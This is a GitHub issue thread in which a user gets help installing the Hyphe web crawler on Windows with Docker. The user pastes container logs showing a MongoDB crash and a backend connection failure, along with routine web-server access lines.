medialab / hyphe

Websites crawler with built-in exploration and control web interface
http://hyphe.medialab.sciences-po.fr/demo/
GNU Affero General Public License v3.0
328 stars 59 forks source link

Need help! Install Hyphe in windows computer #408

Closed ying5207 closed 3 years ago

ying5207 commented 3 years ago

Hi everyone! After I succeed in installing Docker in my Windows computer, I try to follow this instruction:

  1. Download Hyphe Collect Hyphe's source code from this git repository (recommended way to benefit from future updates) or download and uncompress a zipped release, then enter the resulting directory:

git clone https://github.com/medialab/hyphe.git hyphe cd hyphe

I pasted 'git clone https://github.com/medialab/hyphe.git hyphe cd hyphe' in my windows terminal/ PowerShell, it shows "Unable to recognize if 'git' vocabulary is a cmdlet ..."

I have no programming knowledge. Did I do something wrong? How should I solve this problem? Thanks!

boogheta commented 3 years ago

I have no experience with Windows so I won't be able to help much, but at least it looks like you first need to install git for windows. Then I guess you will need either to use a terminal which is not powershell or to adapt the commands for powershell.

ying5207 commented 3 years ago

I have no experience with Windows so I won't be able to help much, but at least it looks like you first need to install git for windows. Then I guess you will need either to use a terminal which is not powershell or to adapt the commands for powershell.

Thank you! Git for windows was installed and success run 'git clone https://github.com/medialab/hyphe.git hyphe cd hyphe'

But next step,

"cp .env.example .env cp config-backend.env.example config-backend.env cp config-frontend.env.example config-frontend.env"

While I pasted these three commands in git for windows, it replied 'bash: bash:: command not found' 'bash: syntax error near unexpected token'

Did I do anything wrong, how do I fix it? Should I change the command to 'cp .env.prod .env' ?

Thanks again

boogheta commented 3 years ago

What is the name of the window in which you run these commands? You should try to open your shell and run these commands from within the hyphe directory where your git clone was placed

ying5207 commented 3 years ago

What is the name of the window in which you run these commands? You should try to open your shell and run these commands from within the hyphe directory where your git clone was placed

Hi, I use windows 10 computer. I tried to paste these 3 lines of commands into Windows PowerShell, it shows 'object not found, path not found ...' Did I need to modify these 3 lines of commands? If yes, can you show me an example after modifying? Or should I run these command in somewhere else? Thanks

cp .env.example .env cp config-backend.env.example config-backend.env cp config-frontend.env.example config-frontend.env

boogheta commented 3 years ago

these commands are very simple and should not be changed at all, it just says to copy paste files. You can skip it by doing it manually inside a files explorer window, just open the directory where hyphe's git clone was placed and copy paste the three example files into identical files without the .example extension, then edit them from there.

ying5207 commented 3 years ago

these commands are very simple and should not be changed at all, it just says to copy paste files. You can skip it by doing it manually inside a files explorer window, just open the directory where hyphe's git clone was placed and copy paste the three example files into identical files without the .example extension, then edit them from there.

Thanks for your reply. Let me get something clear first. What you said about hyphe's git clone, is it the unzipped hyphe-1.4.0 file that I downloaded? If I save hyphe-1.4.0 file to the 'download' folder, should those commands be written as:

download\ hyphe-1.4.0\ .env download\ hyphe-1.4.0\ config-backend.env download\ hyphe-1.4.0\ config-frontend.env

then paste it in Windows PowerShell? Can you please give me an example of how to edit those commands? Many thanks!

boogheta commented 3 years ago

No, you don't need neither to download any zip file not to change any command. When you run the git clone command it does the equivalent for you, so you should have a hyphe directory somewhere where your powershell is executed. Go into this directory, then copy paste and rename the files manually.

ying5207 commented 3 years ago

No, you don't need neither to download any zip file not to change any command. When you run the git clone command it does the equivalent for you, so you should have a hyphe directory somewhere where your powershell is executed. Go into this directory, then copy paste and rename the files manually.

Hi, thanks for your reply. With the help of my IT colleagues, I successfully installed Hyphe on Mac computer in office. But I face some problems while I install it in my Windows computer at home. I placed the command 'docker-compose up' at step 5, but the Hyphe login screen shows YOU ARE DISCONNECTED FROM HYPHE :-( Do you know what the cause is? There is exited(0) for 'hyphe_backend_1' in Docker, is this the reason? Thanks

boogheta commented 3 years ago

This hyphe_backend message explains indeed why the web interface says this. Could you please copy paste the logs line before this message in your docker interface? At least the 100 lines before please.

ying5207 commented 3 years ago

This hyphe_backend message explains indeed why the web interface says this. Could you please copy paste the logs line before this message in your docker interface? At least the 100 lines before please.

Yes, I did copy paste the commands to windows terminal without changing anything, except 'copy' for windows.   You said copy paste the logs line in docker interface, is it means run the docker before copy paste commands to terminal? Yes I did. 

boogheta commented 3 years ago

I guess I wasn't clear: I was asking if you can copy paste here the lines of log that show in your docker interface before the one saying "exited(0) for 'hyphe_backend_1'"

ying5207 commented 3 years ago

I guess I wasn't clear: I was asking if you can copy paste here the lines of log that show in your docker interface before the one saying "exited(0) for 'hyphe_backend_1'"

Are you means this one? Thanks.

/usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.   from cryptography import utils, x509 ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.   from cryptography import utils, x509 ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.   from cryptography import utils, x509 ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.   from cryptography import utils, x509 ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.   from cryptography import utils, x509 ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.   from cryptography import utils, x509 ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json

boogheta commented 3 years ago

Yes but like I said I need way more, at least the 100 lines before, here all lines are identical and don't give much information

ying5207 commented 3 years ago

Yes but like I said I need way more, at least the 100 lines before, here all lines are identical and don't give much information

I like to do it, but that is all the log lines in 'hyphe_backend_1' in docker interface. Would it be help if I copy paste the backend_1 message from Windows PowerShell ?

backend_1 | ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json hyphe_backend_1 exited with code 0 backend_1 | /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. backend_1 | from cryptography import utils, x509 backend_1 | /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. backend_1 | from cryptography import utils, x509 backend_1 | ERROR: Cannot connect to mongoDB, please check your server and the configuration in config/config.json hyphe_backend_1 exited with code 0 hyphe_backend_1 exited with code 0

boogheta commented 3 years ago

I need everything please, not only the backend lines

ying5207 commented 3 years ago

I need everything please, not only the backend lines

Here are all the message from Windows PowerShell. Many thanks!

Windows PowerShell Copyright (C) Microsoft Corporation.

PS C:\Users\ying> git clone https://github.com/medialab/hyphe.git hyphe
fatal: destination path 'hyphe' already exists and is not an empty directory.
PS C:\Users\ying> cd hyphe
PS C:\Users\ying\hyphe> copy .env.example .env
PS C:\Users\ying\hyphe> copy config-backend.env.example config-backend.env
PS C:\Users\ying\hyphe> copy config-frontend.env.example config-frontend.env
PS C:\Users\ying\hyphe> docker-compose pull
Pulling mongo    ... done
Pulling crawler  ... done
Pulling backend  ... done
Pulling frontend ... done
PS C:\Users\ying\hyphe> docker-compose up
Docker Compose is now in the Docker CLI, try `docker compose up`
Starting hyphe_mongo_1 ... done
hyphe_crawler_1 is up-to-date
Starting hyphe_backend_1 ... done
hyphe_frontend_1 is up-to-date
Attaching to hyphe_mongo_1, hyphe_crawler_1, hyphe_backend_1, hyphe_frontend_1
hyphe_mongo_1 exited with code 139
crawler_1   | /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
crawler_1   |   from cryptography import utils, x509
crawler_1   | 2021-05-03T20:27:20+0000 [-] Loading /usr/local/lib/python2.7/site-packages/scrapyd/txapp.py...
crawler_1   | 2021-05-03T20:27:21+0000 [-] Scrapyd web console available at http://0.0.0.0:6800/
crawler_1   | 2021-05-03T20:27:21+0000 [-] Loaded.
crawler_1   | 2021-05-03T20:27:21+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] twistd 20.3.0 (/usr/local/bin/python 2.7.18) starting up.
crawler_1   | 2021-05-03T20:27:21+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] reactor class: twisted.internet.epollreactor.EPollReactor.
crawler_1   | 2021-05-03T20:27:21+0000 [-] Site starting on 6800
crawler_1   | 2021-05-03T20:27:21+0000 [twisted.web.server.Site#info] Starting factory <twisted.web.server.Site instance at 0x7f217963caf0>
crawler_1   | 2021-05-03T20:27:21+0000 [Launcher] Scrapyd 1.2.1 started: max_proc=24, runner=u'scrapyd.runner'
crawler_1   | /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
crawler_1   |   from cryptography import utils, x509
crawler_1   | 2021-05-03T21:01:43+0000 [-] Loading /usr/local/lib/python2.7/site-packages/scrapyd/txapp.py...
crawler_1   | 2021-05-03T21:01:43+0000 [-] Scrapyd web console available at http://0.0.0.0:6800/
crawler_1   | 2021-05-03T21:01:43+0000 [-] Loaded.
crawler_1   | 2021-05-03T21:01:43+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] twistd 20.3.0 (/usr/local/bin/python 2.7.18) starting up.
crawler_1   | 2021-05-03T21:01:43+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] reactor class: twisted.internet.epollreactor.EPollReactor.
crawler_1   | 2021-05-03T21:01:43+0000 [-] Site starting on 6800
crawler_1   | 2021-05-03T21:01:43+0000 [twisted.web.server.Site#info] Starting factory <twisted.web.server.Site instance at 0x7fc96abbf550>
crawler_1   | 2021-05-03T21:01:43+0000 [Launcher] Scrapyd 1.2.1 started: max_proc=24, runner=u'scrapyd.runner'
crawler_1   | /usr/local/lib/python2.7/site-packages/OpenSSL/crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
crawler_1   |   from cryptography import utils, x509
crawler_1   | 2021-05-05T19:48:15+0000 [-] Loading /usr/local/lib/python2.7/site-packages/scrapyd/txapp.py...
crawler_1   | 2021-05-05T19:48:16+0000 [-] Scrapyd web console available at http://0.0.0.0:6800/
crawler_1   | 2021-05-05T19:48:16+0000 [-] Loaded.
crawler_1   | 2021-05-05T19:48:16+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] twistd 20.3.0 (/usr/local/bin/python 2.7.18) starting up.
crawler_1   | 2021-05-05T19:48:16+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] reactor class: twisted.internet.epollreactor.EPollReactor.
crawler_1   | 2021-05-05T19:48:16+0000 [-] Site starting on 6800
crawler_1   | 2021-05-05T19:48:16+0000 [twisted.web.server.Site#info] Starting factory <twisted.web.server.Site instance at 0x7ff165b2e550>
crawler_1   | 2021-05-05T19:48:16+0000 [Launcher] Scrapyd 1.2.1 started: max_proc=24, runner=u'scrapyd.runner'
frontend_1  | 172.18.0.1 - - [03/May/2021:21:10:47 +0000] "GET /conf/conf.js HTTP/1.1" 200 398 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:21:11:17 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/03 21:11:17 [error] 18#18: *1 backend could not be resolved (110: Operation timed out), client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/03 21:11:17 [error] 18#18: *2 backend could not be resolved (110: Operation timed out), client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [03/May/2021:21:11:17 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:21:11:38 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:21:11:38 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/03 21:23:36 [error] 18#18: *5 open() "/frontend/app/robots.txt" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "HEAD /robots.txt HTTP/1.0"
frontend_1  | 172.18.0.1 - - [03/May/2021:21:23:36 +0000] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:21:40:20 +0000] "GET / HTTP/1.1" 200 4970 "-" "curl/7.58.0" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:05:38 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:18 [error] 18#18: *9 open() "/frontend/app/phpmyadmin_/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin_/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:18 +0000] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:18 +0000] "GET /PMA2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:18 [error] 18#18: *10 open() "/frontend/app/PMA2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:19 [error] 18#18: *11 open() "/frontend/app/phpmy/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmy/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:19 +0000] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:19 +0000] "GET /PMA2020/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:19 [error] 18#18: *12 open() "/frontend/app/PMA2020/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2020/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:20 [error] 18#18: *13 open() "/frontend/app/mysql/pMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/pMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:20 +0000] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:20 [error] 18#18: *14 open() "/frontend/app/mysql/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:20 +0000] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:21 [error] 18#18: *15 open() "/frontend/app/sql/sqlweb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqlweb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:21 +0000] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:21 [error] 18#18: *16 open() "/frontend/app/PMA2019/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2019/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:21 +0000] "GET /PMA2019/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:22 +0000] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:22 [error] 18#18: *17 open() "/frontend/app/phpmyadmin2013/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:22 [error] 18#18: *18 open() "/frontend/app/_phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:22 +0000] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:23 +0000] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:23 [error] 18#18: *19 open() "/frontend/app/mysql/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:23 [error] 18#18: *20 open() "/frontend/app/db/webadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/webadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:23 +0000] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:24 [error] 18#18: *21 open() "/frontend/app/phpmyadmin5/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin5/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:24 +0000] "GET /phpmyadmin5/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:24 [error] 18#18: *22 open() "/frontend/app/PMA2016/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2016/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:24 +0000] "GET /PMA2016/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:25 +0000] "GET /PMA2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:25 [error] 18#18: *23 open() "/frontend/app/PMA2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:25 +0000] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:25 [error] 18#18: *24 open() "/frontend/app/sql/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:26 [error] 18#18: *25 open() "/frontend/app/sql/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:26 +0000] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:26 [error] 18#18: *26 open() "/frontend/app/phpMyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:26 +0000] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:27 [error] 18#18: *27 open() "/frontend/app/admin/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:27 +0000] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:27 +0000] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:27 [error] 18#18: *28 open() "/frontend/app/sql/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:28 [error] 18#18: *29 open() "/frontend/app/phpmyadmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:28 +0000] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:28 [error] 18#18: *30 open() "/frontend/app/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:28 +0000] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:29 [error] 18#18: *31 open() "/frontend/app/php-myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /php-myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:29 +0000] "GET /php-myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:30 [error] 18#18: *32 open() "/frontend/app/pma2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:30 +0000] "GET /pma2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:30 +0000] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:30 [error] 18#18: *33 open() "/frontend/app/phpMyAdmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:31 [error] 18#18: *34 open() "/frontend/app/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:31 +0000] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:31 [error] 18#18: *35 open() "/frontend/app/sql/php-myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:31 +0000] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:32 +0000] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:32 [error] 18#18: *36 open() "/frontend/app/phpMyAdmin5/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
